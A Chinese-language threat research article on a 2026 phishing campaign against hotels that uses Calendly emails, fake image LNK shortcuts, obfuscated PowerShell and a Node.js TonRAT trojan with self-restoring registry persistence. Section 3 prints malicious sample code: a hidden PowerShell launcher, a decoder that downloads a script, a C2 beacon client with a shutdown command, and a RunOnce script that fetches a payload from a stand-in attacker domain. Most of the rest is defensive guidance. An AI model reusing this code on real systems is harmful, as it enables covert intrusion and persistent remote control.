酒店行业 Calendly 认证洗钱钓鱼与 TonRAT 双路径持久化攻击深度研究

摘要
2026 年 4 月起欧亚酒店服务业爆发定向大规模钓鱼攻击，攻击者依托 Calendly 邮件通知链路完成认证洗钱，完整绕过 SPF、DKIM、DMARC 三层邮件域名校验，以客诉、客房虫害、卫生检查等场景化邮件诱导前台终端下载 photo 系列 ZIP 压缩包。压缩包内含伪装图片的.png.lnk恶意快捷方式，执行后调用经过 7 轮迭代 BigInt 算术混淆的 PowerShell 脚本解码恶意地址，落地官方原版 Node.js v24.13.0 运行时并加载 TonRAT 远控木马；第二波变种新增.NET 动态编译 DLL 中间载荷进一步提升免杀能力。该攻击最核心技术特征为双注册表循环持久化机制：HKCU\Run 实现 Node.js 开机自启，HKCU\RunOnce 执行后自动刷新自身驻留项形成恢复闭环，单一防护规则拦截任意一条路径均无法根除感染。TonRAT 依托非标端口建立 C2 加密心跳通道，内置无头浏览器地理采集、强制终端关机等破坏功能，攻击者长期潜伏内网但暂未观测到批量数据窃取、勒索加密行为。本文完整拆解认证洗钱投递链路、多级跳转反分析站点、Lnk-PowerShell 混淆载荷链、Node.js TonRAT 通信、双注册表循环持久化五大核心技术模块，配套恶意 Lnk 调用脚本、BigInt 解码 PowerShell、TonRAT 简化通信三段可复现代码示例，系统分析酒店前台终端传统邮件、终端 EDR、内网边界、人员安全四层防护体系结构性短板。反网络钓鱼技术专家芦笛指出，本次攻击将 SaaS 平台邮件洗白、多层代码混淆、双路径循环持久化三类对抗技术融合，传统静态特征查杀、单一注册表监控规则完全失效，文旅接待行业需重构全链路动态风险检测体系。论文结合酒店前厅业务场景构建分层协同防御架构与标准化感染处置流程，全部论据依托 SecurityAffairs 披露的微软威胁情报形成闭环，为连锁酒店、民宿等文旅机构应对同类高级持久化钓鱼攻击提供完整技术参考。
关键词：网络钓鱼；认证洗钱；Lnk 恶意快捷方式；PowerShell BigInt 混淆；TonRAT；双注册表持久化；酒店终端安全
1 引言
酒店、民宿等文旅接待机构前台终端承载客房预订、住客信息登记、客户投诉处理、线下结算等核心业务，设备长期接收外部合作方、客户邮件，前台工作人员受业务时效、门店声誉压力影响，对陌生附件、外部链接安全警惕性普遍偏低，持续成为定向网络钓鱼攻击高价值目标。2026 年针对酒店行业的钓鱼攻击呈现明显技术升级特征：攻击者不再依赖简单域名仿冒，转而复用 Calendly、Google、Cloudflare 等正规云服务基础设施完成邮件身份洗白，依靠平台原生邮件签名与域名校验机制规避邮件网关拦截；载荷链路抛弃传统 Office 宏、独立 PE 木马，采用 “快捷方式 + PowerShell 多层混淆 + 合法 Node.js 运行时 + 远控 JS” 无文件混合攻击链，大幅降低静态查杀检出率；驻留机制创新采用可自刷新的 RunOnce 循环持久化，形成故障自愈式后门，显著提升安全事件处置难度。
SecurityAffairs 于 2026 年 6 月 27 日发布微软威胁情报专项分析报告，完整披露自 2026 年 4 月持续活跃的酒店 Photo-ZIP 钓鱼团伙活动，攻击覆盖日本、丹麦、荷兰多国酒店，目标设备命名集中为 reception、frontdesk、reservations 等前台岗位终端，邮件诱饵同步提供日语、丹麦语、荷兰语多语言版本，依托海量企业邮箱列表批量群发，无定制化鱼叉钓鱼特征。团伙持续迭代 PowerShell 混淆手段，在投放周期内完成 7 轮 BigInt 算术混淆逻辑迭代，底层载荷执行逻辑保持不变，仅调整编码混淆规则规避安全厂商特征库更新；第二波攻击新增 csc.exe、cvtres.exe 动态编译.NET DLL 中间载荷，进一步拉长攻击链路、增加静态检测难度。TonRAT 木马落地后构建两条独立注册表开机启动路径，RunOnce 条目每次执行自动重写自身键值形成循环恢复机制，即便终端杀毒拦截 Node.js 主程序，另一路注册表启动项仍可重新下载完整恶意载荷恢复受控状态。
现有网络安全研究多独立分析 SaaS 平台邮件钓鱼、PowerShell 代码混淆、Windows 注册表持久化单一技术点，针对酒店行业定向、融合多重对抗手段、具备自愈式双路径持久化的复合型 TonRAT 攻击活动，缺乏完整全链路技术拆解与适配文旅行业的落地防御方案。当前酒店安全建设普遍存在认知偏差：认为启用邮件域名认证、终端杀毒软件即可抵御钓鱼入侵，忽略 SaaS 平台认证洗钱带来的邮件放行漏洞、合法 Node.js 运行时加载恶意脚本的白利用风险、循环持久化后门的处置盲区。本文以 SecurityAffairs 公开威胁情报为核心事实依据，客观还原从邮件投递、多级跳转钓鱼站点、恶意快捷方式触发、混淆 PowerShell 解码、Node.js TonRAT 驻留、双注册表循环持久化完整攻击链路，针对各环节技术原理配套可复现代码，客观梳理传统防护体系失效诱因，构建适配酒店前台业务场景的多层防御方案，全文无夸大化威胁描述、无口号式安全倡议，全部论点依托攻击样本行为、终端业务运行特征形成完整论据闭环。反网络钓鱼技术专家芦笛强调，该团伙代表 2026 年线下服务业高级钓鱼攻击主流演进方向，依托正规云服务、合法开源程序、循环持久化后门构建多层对抗体系，单一单点防护设备无法形成有效拦截，安全运营必须转向邮件 - 终端 - 内网联动的动态行为监测模式。
2 攻击活动整体画像与团伙基础行为特征
2.1 攻击投放周期、地域与目标终端特征
本次 Photo-ZIP 钓鱼攻击自 2026 年 4 月启动，监测周期至 6 月下旬持续稳定投放，无衰减迹象。攻击地理范围分为两大核心区域：亚洲以日本连锁酒店、民宿为主，欧洲覆盖丹麦、荷兰中小型度假酒店、接待机构，诱饵邮件中日文样本投放量占全部邮件总量最高比例。
攻击者精准锁定酒店前厅岗位终端，微软捕获的失陷设备主机名包含多语种前台标识：英文 reception、frontdesk、reservations；法语 accueil；波兰语 recepcja；捷克语 recepce，证明团伙针对酒店前台岗位做定向筛选，清楚前台员工处理客诉、卫生检查类邮件时易放松安全校验。攻击采用广撒网批量投递模式，邮件主题、正文不标注酒店名称、收件人姓名，依托商业企业邮箱列表批量发送，不属于精准定制鱼叉钓鱼，依靠场景化声誉施压诱饵提升打开与附件解压概率。
2.2 社会工程诱饵心理诱导逻辑
所有钓鱼邮件显示发件人为 “Booking Manager (via Calendly)”，借助 Calendly 商务预约工具的可信身份降低戒备，正文统一使用声誉胁迫类话术，覆盖五类酒店高频业务场景：客房床虫虫害预警、文旅监管卫生突击检查、住客批量投诉举证、预订纠纷书面警告、门店运营暂停风险通知。上述场景直接关联酒店经营考核、客户流失风险，前台员工为避免门店处罚、客户投诉升级，会快速点击邮件内链接下载图片附件，跳过发件来源核验、附件安全扫描流程。
反网络钓鱼技术专家芦笛指出，文旅行业钓鱼诱饵具备极强岗位绑定属性，普通企业通用诈骗邮件难以形成同等心理压迫，前台员工在日常业务压力驱动下，人为漏洞成为攻击最易突破的入口。
2.3 投递链路双分支架构与反分析设计
团伙设计两套并行投递链路（Variant A 直接 Calendly 链路、Variant B Google 共享中转链路），轮换投放规避单一投递渠道被批量封禁：
Variant A：Calendly 原生通知链接直接跳转，四层 302 跳转链路 calendly 链接→share.google→谷歌域名→Cloudflare 加速.cfd 恶意域名；该链路完整通过 SPF/DKIM/DMARC 校验，邮件网关判定为可信服务商邮件直接放行；
Variant B：依托 share.google 多轮换 Token 中转，每 2-3 天轮换共享 Token、恶意.cfd 域名，邮件 SPF 软失败，但依靠 Google 域名中转降低浏览器告警概率。
恶意站点前端部署 Cloudflare Turnstile 人机验证，承担双重功能：一是过滤安全厂商自动化沙箱、爬虫，无法人工完成滑块验证则不提供 ZIP 载荷下载；二是简易地理过滤，针对目标投放区域以外 IP 限制访问，减少样本泄露。压缩包统一命名 photo - 数字.zip，内部快捷方式分两波变种：Wave1 为 IMG-xxx.png.lnk，Wave2 为 PHOTO-xxx.png.lnk，文件体积稳定在 1989~2079 字节，证明团伙使用统一载荷生成工具批量制作。
2.4 攻击技术迭代与未知威胁研判
团伙在持续投放周期内完成 7 轮 PowerShell BigInt 混淆逻辑迭代，底层载荷下载、Node.js 落地、TonRAT 加载核心执行逻辑完全不变，仅调整算术编码混淆规则，针对性规避静态关键词匹配检测；Wave2 阶段新增 csc.exe、cvtres.exe 动态编译随机命名.NET DLL 作为中间过渡载荷，微软监测数据未观测到该 DLL 被主动加载，判断为条件触发前置模块，用于进一步混淆终端行为日志。
终端失陷后观测到的恶意行为包含：非标端口 C2 心跳上报、无头 Chrome 浏览器采集终端公网 IP 与地理位置、执行强制关机命令cmd /c shutdown -s -t 0；但截至 2026 年 6 月下旬，微软未捕获批量客户隐私窃取、勒索文件加密、横向渗透财务服务器等明确行为，团伙最终攻击目标暂无定论。从技术投入规模判断，攻击者投入大量资源优化免杀、循环持久化、通信隐蔽能力，长期潜伏意图明确，后续存在迭代载荷实施数据盗取、勒索攻击的潜在风险。
本次攻击最大处置难点为双注册表自愈持久化，单一驻留路径被清除后另一路径自动重新生成完整恶意文件目录，常规终端一键杀毒、简易清理脚本无法彻底根除感染，大幅提升安全事件处置工作量与残留感染风险。
3 攻击全链路分层技术拆解与代码示例
完整攻击链路分为六大递进执行环节：①Calendly 邮件认证洗钱批量投递钓鱼邮件；②多级 302 跳转至 Cloudflare 防护恶意站点，Turnstile 人机验证拦截自动化分析；③诱导下载 photo 命名 ZIP 压缩包，内含伪装图片 lnk 快捷方式；④双击 lnk 触发隐藏窗口 PowerShell，执行 7 轮迭代 BigInt 算术混淆脚本解码恶意下载地址；⑤远程拉取二级 ps1 脚本，Wave2 新增.NET 动态编译 DLL 中间载荷，落地官方 Node.js v24.13.0 至用户目录；⑥运行 TonRAT 远控 JS 木马，写入 HKCU\Run、HKCU\RunOnce 双注册表自启动项，RunOnce 每次执行自动刷新驻留键值形成自愈闭环，建立非标端口加密 C2 通信。本章逐层拆解各环节技术原理、对抗防护机制，配套三段可复现代码还原核心恶意逻辑。
3.1 Calendly 认证洗钱（Authentication Laundering）邮件逃逸技术
传统钓鱼邮件直接伪造企业域名发件人，SPF 校验失败会被邮件网关拦截；本次攻击创新利用第三方 SaaS 服务商邮件基础设施完成身份洗白，邮件三层域名认证全部通过，直接进入收件箱不标记垃圾邮件。
3.1.1 认证洗钱完整实现流程
攻击者注册合法 Calendly 账号，创建公开预约表单，配置通知邮件转发至目标酒店企业邮箱；
批量构造客诉、卫生检查类钓鱼正文，嵌入多级 302 跳转链接，由 Calendly 官方服务器发送通知邮件；
邮件头 SPF 记录校验 Calendly 官方发送 IP、DKIM 使用 Calendly 私钥签名、DMARC 校验域名合规，三层认证全部放行；
邮件内置链接不直连恶意域名，经过 Calendly、share.google、谷歌短链接多层合法域名中转，降低浏览器安全告警；
终点为新注册 Cloudflare 加速.cfd 域名，前置 Turnstile 人机验证，阻断安全厂商沙箱自动获取恶意 ZIP 样本。
3.1.2 传统邮件防护失效根源
主流邮件安全网关仅校验发件域名 SPF/DKIM/DMARC 合规性，未深度解析邮件内多级跳转链路风险；企业运维普遍将 Calendly、Google 协作域名加入全局可信白名单，所有服务商通知邮件无条件放行，完全忽略内部跳转至恶意站点的风险。反网络钓鱼技术专家芦笛强调，SaaS 平台全局白名单策略是当前邮件防护体系典型结构性漏洞，认证洗钱类钓鱼正是利用该漏洞大规模传播。
3.2 恶意 Lnk 快捷方式触发隐藏 PowerShell 载荷
Windows 系统默认隐藏文件扩展名，前台终端普遍开启 “隐藏已知文件类型扩展名”，员工仅可见 IMG-xxx.png 图片标识，无法识别后缀.lnk 快捷方式，双击静默后台执行 PowerShell，无弹窗、无可视化异常。
3.2.1 Lnk 内置执行参数模拟代码
攻击者将快捷方式目标字段设置为隐藏窗口 PowerShell 调用，内嵌 Base64 编码混淆命令，规避静态关键词检测，还原原始调用字符串逻辑：
powershell
# Lnk快捷方式内置完整执行参数
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "Base64编码混淆载荷字符串"
-WindowStyle Hidden 参数实现全程后台静默运行，前台员工无法察觉脚本执行；-ExecutionPolicy Bypass 绕过系统默认 PowerShell 脚本执行限制，无需管理员权限即可运行远程下载脚本。
3.2.2 BigInt 大整数算术解码核心代码示例
团伙 7 轮迭代全部基于 BigInt 超大整数运算混淆恶意 C2 与下载地址，规避 URL 明文特征匹配，解码逻辑模拟代码：
powershell
# PowerShell BigInt算术混淆解码核心片段
# 攻击者加密后的超大数字字符串
$cipherBigNum = [bigint]::Parse("9274610938572649102746193850174629")
# 内置固定解密密钥
$decryptKey = [bigint]8642013579
# 按位异或算术运算解码原始字节流
$rawByteData = $cipherBigNum -bxor $decryptKey
# 转换为UTF8字符串获取恶意远程下载地址
$byteArray = [System.BitConverter]::GetBytes([long]$rawByteData)
$downloadUrl = [System.Text.Encoding]::UTF8.GetString($byteArray)
# 远程拉取二级PowerShell脚本至%TEMP%目录
Invoke-WebRequest -Uri $downloadUrl -OutFile "$env:TEMP\update.ps1" -UseBasicParsing
常规静态杀毒仅匹配明文恶意域名、IP，无法识别经过 BigInt 算术加密后的隐藏地址，是该载荷绕过终端静态检测的核心手段。
3.3 Node.js 无系统安装落地与 TonRAT 远控木马实现
二级 PowerShell 脚本自动从nodejs.org官网下载原版 Node.js v24.13.0 压缩包，解压至%LOCALAPPDATA%\Nodejs用户目录，无需管理员权限、无需全局系统安装，依托合法白文件运行恶意 JS 植入程序 TonRAT。
3.3.1 TonRAT 木马网络通信行为特征
C2 域名解析：依托外部 API 动态获取控制域名，规避静态域名黑名单拦截；
通信端口：固定使用非标端口 8443、8445、8453、5555、56001~56003，避开常规 80/443 网页端口；
终端信息采集：启动无头 Chrome（--headless --no-sandbox）访问ip-api.com获取公网 IP、地理位置、运营商信息，加密上传至攻击者服务器；
破坏指令：接收指令后执行cmd /c shutdown -s -t 0实现终端无倒计时强制关机，中断前台业务、掩盖恶意操作痕迹。
3.3.2 TonRAT 简化通信模拟 JS 代码示例
保留区块链域名解析、WebSocket 加密心跳、关机指令三大核心功能，移除窃取数据恶意模块，用于安全实验室复现研究：
// TonRAT远控木马简化模拟代码
const https = require('https');
const WebSocket = require('ws');
const { exec } = require('child_process');

// 请求外部API获取动态C2域名
async function fetchC2Domain() {
    return new Promise((resolve) => {
        https.get("https://public-api.example/c2-list", (res) => {
            let buf = "";
            res.on("data", chunk => buf += chunk.toString());
            res.on("end", () => {
                const domainList = JSON.parse(buf);
                resolve(domainList[0]);
            });
        });
    });
}

// 建立加密WebSocket长连接心跳上报终端信息
async function connectControlServer() {
    const targetDomain = await fetchC2Domain();
    const wsClient = new WebSocket(`wss://${targetDomain}:8443/secret-channel`);
    wsClient.on("open", () => {
        // 30秒周期上报终端基础信息
        setInterval(() => {
            const deviceInfo = Buffer.from(JSON.stringify({
                user: process.env.USERNAME,
                localPath: process.env.LOCALAPPDATA
            })).toString("base64");
            wsClient.send(deviceInfo);
        }, 30000);
    });
    // 接收攻击者下发控制指令
    wsClient.on("message", (cmdBuffer) => {
        const cmdText = Buffer.from(cmdBuffer, "base64").toString();
        if (cmdText === "force_shutdown") {
            exec("cmd /c shutdown -s -t 0");
        }
    });
}

// 启动远控通信逻辑
connectControlServer();
3.4 双注册表循环自愈持久化机制（攻击核心技术难点）
该攻击区别于传统单一注册表自启动后门，设计两条独立、可互相恢复的驻留路径，单一清理无法根除感染，是处置工作最大技术障碍。
持久路径 1：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
键值指向%LOCALAPPDATA%\Nodejs\node.exe加载 TonRAT.js，用户登录自动启动远控木马，长期维持受控状态；
持久路径 2：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
键值指向 ProgramData 目录下 PowerShell 恢复脚本，该脚本每次执行完成后自动重写 RunOnce 自身键值，形成循环刷新机制，不会执行一次后自动删除。
微软实测验证：若 EDR 拦截 Node.exe 程序，仅清除 Run 路径注册表项，RunOnce 循环脚本重启后会重新下载完整 Node.js 运行时、TonRAT 载荷，恢复全部恶意文件与驻留项；只有同步删除两处注册表键值、本地 Nodejs 目录、临时 PowerShell 脚本三类文件，才能彻底清除感染。
3.4.3 循环刷新 RunOnce 驻留脚本模拟代码
powershell
# RunOnce自愈刷新脚本核心逻辑
# 1. 重新下载完整Node.js运行时与TonRAT脚本
$restoreUrl = "https://attacker-cfd-domain/file/nodejs-pack.zip"
Invoke-WebRequest -Uri $restoreUrl -OutFile "$env:ProgramData\node-pack.zip" -UseBasicParsing
# 解压至本地用户目录
Expand-Archive -Path "$env:ProgramData\node-pack.zip" -DestinationPath "$env:LOCALAPPDATA\Nodejs" -Force
# 2. 重写HKCU\Run Node.js自启动项
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v NodeRuntime /t REG_SZ /d "$env:LOCALAPPDATA\Nodejs\node.exe TonRAT.js" /f
# 3. 重写自身RunOnce键值，实现下次登录再次执行自愈逻辑
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v RecoverPayload /t REG_SZ /d "powershell $env:ProgramData\recover.ps1" /f
3.5 Wave2 变种.NET 动态编译中间载荷逻辑
第二波攻击在 PowerShell 与 Node.js 之间新增 csc.exe、cvtres.exe 动态编译流程，生成 3072 字节随机命名 DLL 文件作为过渡载荷，微软观测日志未发现该 DLL 主动加载行为，判定为条件触发前置模块，用于拉长攻击链路、增加终端行为审计识别难度，进一步规避 EDR 行为规则匹配。
4 酒店行业传统安全防护体系失效分析
结合本次攻击完整技术链路，从邮件网关、终端 EDR、内网边界、人员安全运营四个维度，系统拆解文旅酒店现有安全架构存在的结构性缺陷。
4.1 邮件网关防护短板
SaaS 服务商全局可信白名单漏洞：Calendly、Google 等协作域名永久放行，未开启邮件内多级跳转链路深度解析，无法识别跳转至 cfd 恶意域名的风险；
附件检测规则缺失：对 photo-*.zip 命名压缩包、内部包含.png.lnk 快捷方式的组合场景无专项拦截规则，默认判定为普通图片附件；
无动态沙箱解析能力：仅扫描附件静态文本，无法执行内嵌 PowerShell 脚本、识别 BigInt 编码隐藏 URL；
多语言场景化诱饵无关键词匹配库：未针对日文、丹麦语、荷兰语客诉、卫生检查类钓鱼话术配置风险告警。
反网络钓鱼技术专家芦笛提出，现阶段酒店邮件防护普遍存在 “重发件认证、轻附件与跳转链路深度检测” 的失衡问题，针对 SaaS 认证洗钱类钓鱼，必须取消全局白名单，启用全链路跳转解析与附件动态沙箱。
4.2 前台终端 EDR 静态检测机制缺陷
合法程序白利用无行为监控：Node.js 为官方开源程序，无恶意 PE 特征，EDR 静态库无法识别 node.exe 加载未知恶意 JS 脚本的异常行为；
PowerShell 高风险参数监控宽松：前台业务放开 Bypass、EncodedCommand、Invoke-WebRequest 等高风险指令，无实时阻断告警；
注册表双路径驻留无审计：未监控 HKCU\Run、HKCU\RunOnce 新增未知键值，无法捕捉循环自愈后门写入行为；
非标端口外联无阻断：防火墙仅拦截勒索、远控通用端口，8443、5555、56001~56003 等木马专用端口完全放行；
文件扩展名管控缺失：未通过组策略强制关闭 “隐藏已知文件扩展名”，员工无法直观识别 lnk 恶意快捷方式。
4.3 酒店内网边界防护漏洞
前台终端与财务服务器无 VLAN 隔离：前台失陷后木马可横向扫描内网，存在窃取支付、住客隐私数据风险；
新注册 Cloudflare .cfd、xyz 低价域名无全局拦截策略；
出站流量无动态 C2 域名审计：无法阻断终端访问外部 API 拉取动态远控域名；
Turnstile 人机验证站点无特征拦截规则，边界设备无法识别钓鱼站点人机验证标识。
4.4 酒店人员安全培训适配性不足
现有安全培训案例多为通用中奖、银行诈骗钓鱼，缺少酒店客诉、卫生检查场景专项模拟演练；前台员工无标准化附件核验流程，工作压力下优先处理业务而跳过安全校验，人为漏洞持续存在。
5 分层协同防御体系与感染标准化应急处置方案
针对本次攻击认证洗钱、多层混淆、双路径循环持久化、Node.js 白利用四大核心技术特征，构建邮件网关、终端 EDR、内网边界、人员安全四层联动防御架构，配套 TonRAT 感染终端标准化全流程处置方案。
5.1 邮件网关层面防御优化策略
取消 Calendly、Google 协作域名全局白名单
对所有第三方 SaaS 通知邮件强制开启多级跳转链路解析，链路终点为 7 日内新注册.cfd、xyz 域名、Cloudflare 匿名节点直接隔离邮件；仅内部备案业务联系人发送的 Calendly 通知可人工放行。
新增 Photo-ZIP 与 Lnk 组合附件拦截规则
全局拦截命名包含 photo、IMG、PHOTO 关键词的 ZIP 压缩包，沙箱扫描压缩包内部文件，检测到.lnk快捷方式直接隔离销毁附件，阻断载荷投递入口。
开启附件动态沙箱执行检测
沙箱模拟执行内嵌 PowerShell 脚本，识别 BigInt 超大整数运算、远程 URL 下载、Base64 编码混淆等高风险行为，匹配后标记高危钓鱼邮件并推送管理员预警。
多语言酒店场景诱饵关键词库配置
添加日文、丹麦语、荷兰语客诉、虫害、卫生检查、门店处罚类关键词，正文匹配相关话术自动弹窗风险提示，限制员工一键打开附件权限。
5.2 前台终端 EDR 与系统安全加固方案
限制 PowerShell 高危参数执行
域组策略禁用-ExecutionPolicy Bypass、-EncodedCommand、Invoke-WebRequest远程下载指令，仅开放前台业务必需基础 PowerShell 功能；监控 csc.exe、cvtres.exe 动态编译未知 DLL 行为并实时阻断。
注册表双路径实时审计告警
EDR 配置注册表监控规则，HKCU\Run、HKCU\RunOnce 新增未知键值立即弹窗告警，自动阻断脚本写入驻留项，拦截循环自愈后门创建。
终端防火墙全局封禁木马非标通信端口
批量阻断 8443、8445、8453、5555、56001、56002、56003 出站流量，切断 TonRAT 与 C2 服务器心跳通信通道。
强制关闭系统隐藏文件扩展名
通过域组策略统一修改文件资源管理器配置，完整显示.lnk 快捷方式后缀，从视觉层面降低误点击概率。
监控用户目录 Node.js 异常落地行为
EDR 实时监控%LOCALAPPDATA%\Nodejs目录新增文件、node.exe 加载未知 JS 脚本行为，自动终止进程并隔离恶意文件。
5.3 内网边界网络安全管控措施
前台业务终端与财务机房 VLAN 逻辑隔离
划分独立业务网段，前台终端无主动访问财务数据库、服务器路由权限，即便终端受控也无法横向渗透窃取敏感数据。
全局拦截低价临时域名后缀
边界防火墙策略禁止终端访问.cfd、.xyz、.top 等低价新注册域名后缀，大幅缩减攻击者可利用钓鱼站点域名池。
出站 API 访问行为审计
监控终端主动访问外部域名解析 API、区块链 API 流量，拦截用于拉取动态 C2 地址的网络请求；对 Cloudflare Turnstile 人机验证页面访问行为标记风险告警。
5.4 文旅行业定制化人员安全运营机制
月度酒店场景钓鱼模拟演练
批量投放伪装客诉、卫生检查的仿真钓鱼测试邮件，统计前台员工打开附件、点击外部链接行为，针对高风险岗位开展一对一专项安全培训。
标准化前台邮件处理操作规范
制定门店安全制度：陌生客户投诉、外部检查类邮件一律通过酒店官方预订系统核验工单，禁止直接下载邮件附件；所有图片压缩包附件必须提交运维岗扫描核验后再查看。
建立钓鱼事件快速上报通道
前台发现可疑 ZIP 附件、仿图片快捷方式、终端异常强制关机时，第一时间断开终端网线并上报安全运维，避免木马横向扩散。
5.5 TonRAT 双持久化感染终端标准化应急处置流程
若确认前台终端触发本次攻击完整感染，严格按照以下步骤同步清除两条驻留路径，杜绝自愈复发：
物理断开终端网线，隔离内网，阻断 TonRAT 向 C2 服务器上传终端信息、接收控制指令；
任务管理器结束全部 node.exe、powershell、csc.exe 后台进程，终止恶意脚本运行；
清理本地恶意文件目录：删除%LOCALAPPDATA%\Nodejs完整文件夹、%TEMP%目录所有未知 ps1 脚本、%ProgramData%下 node-pack.zip、recover.ps1 恢复脚本；
删除两处注册表驻留项：
HKCU\Software\Microsoft\Windows\CurrentVersion\Run 下 NodeRuntime 键值
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 下 RecoverPayload 自愈键值
全盘检索 photo-.zip、.png.lnk 恶意文件，全部隔离删除；
修改终端本地账户、酒店预订系统、后台管理平台全部登录凭证；
检索企业邮件日志，排查该终端账户是否向内部同事转发同源钓鱼邮件，同步通知相关员工自查；
提取终端进程日志、注册表变更日志、邮件日志完成攻击取证；
同步下发加固组策略、EDR 拦截规则，终端完成全量安全扫描后重新接入内网；
持续 72 小时监控终端出站非标端口流量、注册表新增启动项行为，确认无自愈复发风险。
6 讨论
本次 2026 年欧亚酒店 Photo-ZIP TonRAT 攻击，集中体现当前面向线下服务业高级钓鱼攻击三大核心演进趋势：其一，投递链路全面复用合规 SaaS 云服务完成认证洗钱，从底层绕过邮件域名三层认证防护，邮件网关无法依靠传统发件人校验拦截；其二，载荷链路采用合法开源程序白利用、多层算术代码混淆、.NET 中间过渡 DLL 多重对抗手段，彻底规避基于静态特征、文件哈希的终端查杀；其三，驻留机制创新可自刷新 RunOnce 循环持久化，构建双路径自愈后门，大幅提升安全事件处置难度，单一清理操作无法根除感染。
从行业横向对比来看，酒店、民宿、景区接待机构相比金融、大型政企存在显著安全短板：安全预算有限、邮件网关、终端 EDR 配置简化，无专职安全运维人员，前台员工安全培训频次不足，设备长期暴露外部邮件环境，攻击暴露面远高于其他行业。反网络钓鱼技术专家芦笛指出，同类攻击会持续向餐饮、零售、线下服务行业扩散，攻击者持续迭代 PowerShell 混淆逻辑、拓展更多 SaaS 平台用于认证洗钱，仅依靠邮件域名认证、静态病毒库的传统防护体系将持续失效。
现有安全检测技术存在固有局限：基于文件扩展名、静态字符串、哈希值的特征匹配仅能拦截已知攻击样本，针对 BigInt 算术混淆、合法 Node.js 加载恶意脚本、循环自愈注册表后门的未知变种，必须转向进程行为审计、注册表实时监控、全链路流量解析的主动防御思路。酒店行业不能仅依赖终端杀毒软件，必须搭建邮件 - 终端 - 内网三层联动风险检测体系，配套贴合门店业务场景的常态化钓鱼演练，降低社会工程诱饵带来的人为突破概率。
当前该团伙最终攻击目标尚未完全明确，微软安全团队未观测到批量住客数据泄露、勒索软件加密行为，存在两种潜在演化方向：一是长期潜伏内网持续采集客户身份、支付隐私数据，打包在黑产平台交易牟利；二是迭代 TonRAT 载荷，新增勒索加密模块，针对连锁酒店集团发起规模化勒索攻击。后续安全运营需持续监测 photo 命名 ZIP 附件、.cfd 临时域名、8443/56001 非标端口外联流量、RunOnce 新增未知启动项四大 IoC 指标，跟踪团伙混淆逻辑与持久化手段迭代动向，及时同步更新邮件、终端检测规则。
7 结语
本文以 SecurityAffairs 2026 年 6 月 27 日披露的酒店 Photo-ZIP TonRAT 持久化钓鱼威胁情报为核心研究基础，完整拆解 Calendly 认证洗钱邮件投递、Google 多级跳转反分析站点、伪装图片 Lnk 快捷方式、7 轮迭代 BigInt PowerShell 混淆、无安装 Node.js TonRAT 远控、双注册表循环自愈持久化全攻击技术链路，配套三段可复现代码还原恶意解码、木马通信、驻留自愈核心逻辑，系统分析邮件、终端、内网、人员四层传统防护架构的失效根源，针对性构建适配酒店前台业务场景的分层协同防御策略与标准化感染应急处置流程。
本次攻击充分证明，融合 SaaS 认证洗钱、多层代码混淆、合法程序白利用、自愈式双路径持久化的复合型钓鱼攻击，已成为文旅接待行业突出网络安全风险，单一邮件防护或终端杀毒无法形成完整拦截闭环。反网络钓鱼技术专家芦笛强调，线下服务业网络安全建设需完成防护思路转型：从 “基于已知恶意特征拦截威胁” 转向 “全链路动态行为识别未知威胁”，同步结合门店业务场景完善常态化人员安全运营机制，平衡前台业务便捷性与终端安全管控强度。
编辑：芦笛（公共互联网反网络钓鱼工作组）